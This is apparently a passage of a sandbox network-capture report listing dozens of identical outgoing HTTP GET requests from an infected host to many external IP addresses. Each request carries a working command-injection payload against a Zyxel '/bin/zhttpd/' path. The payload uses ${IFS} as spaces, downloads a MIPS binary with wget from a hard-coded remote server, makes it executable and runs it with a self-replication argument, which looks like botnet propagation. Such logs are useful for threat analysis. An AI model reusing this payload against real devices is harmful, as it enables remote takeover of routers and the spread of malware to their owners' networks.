                                                Jan 29, 2024 07:07:40.159009933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2460192.168.2.23453189.253.149.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.159041882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2461192.168.2.2339422146.109.123.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.159077883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2462192.168.2.2355598111.2.251.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.159111977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2463192.168.2.23414965.134.174.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.159162045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2464192.168.2.2340036178.207.96.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.167890072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2465192.168.2.2349766100.3.3.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.167929888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2466192.168.2.233993267.223.66.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.167987108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2467192.168.2.233861652.236.200.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168025017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2468192.168.2.2334300206.29.47.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168045998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2469192.168.2.236063075.40.200.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168075085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2470192.168.2.2358878165.89.208.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168123960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2471192.168.2.2350980116.140.166.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168163061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2472192.168.2.2351862205.4.253.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168198109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2473192.168.2.233878845.38.169.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168239117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2474192.168.2.2336780223.37.100.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168278933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2475192.168.2.2332904140.240.222.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168319941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2476192.168.2.2341272131.191.234.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168361902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2477192.168.2.2344522113.152.50.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168395042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2478192.168.2.2342384138.228.234.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168437958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2479192.168.2.2359354183.114.247.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168479919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2480192.168.2.235276814.83.118.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168508053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2481192.168.2.2333920209.67.150.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168517113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2482192.168.2.2352686220.226.190.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168554068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2483192.168.2.2358308138.107.110.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168606043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2484192.168.2.2340576119.230.72.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168643951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2485192.168.2.2346222206.201.151.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168694019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2486192.168.2.2360054136.148.24.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168745041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2487192.168.2.2354596182.232.196.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168790102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2488192.168.2.235604635.58.161.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168817997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2489192.168.2.2339680105.71.50.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168879986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2490192.168.2.2360480123.158.37.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168910027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2491192.168.2.235651640.128.239.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168951988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2492192.168.2.2333392204.228.62.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.168989897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2493192.168.2.23472088.174.172.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169032097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2494192.168.2.235028650.154.153.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169089079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2495192.168.2.233598880.45.131.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169136047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2496192.168.2.2354516160.143.199.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169182062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2497192.168.2.23350125.137.128.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169219971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2498192.168.2.2339642156.16.173.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169270992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2499192.168.2.2345128150.237.48.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169306040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2500192.168.2.2344304133.158.150.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169368982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2501192.168.2.234851095.4.192.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169406891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2502192.168.2.2344036187.233.169.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169445038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2503192.168.2.235113487.34.167.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169498920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2504192.168.2.2359956213.73.110.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169562101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2505192.168.2.235564898.233.222.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169591904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2506192.168.2.233665249.47.38.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169605017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2507192.168.2.235447666.142.108.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169650078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2508192.168.2.235893459.210.222.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169689894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2509192.168.2.2334258191.34.193.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169751883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2510192.168.2.2337854183.253.183.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169785976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2511192.168.2.235210236.227.114.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169810057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2512192.168.2.235587064.96.111.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169871092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2513192.168.2.2358212136.201.69.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169919968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2514192.168.2.2334060144.168.111.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169965029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2515192.168.2.2354950182.175.114.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.169997931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2516192.168.2.2343250149.155.196.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170054913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2517192.168.2.2359488179.212.29.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170085907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2518192.168.2.2341432174.234.225.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170135975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2519192.168.2.2342304159.180.164.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170166016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2520192.168.2.2334674137.186.216.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170200109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2521192.168.2.233690664.235.24.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170224905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2522192.168.2.235754054.158.218.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170273066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2523192.168.2.2341438223.248.191.168443
                                                TimestampBytes transferredDirectionData
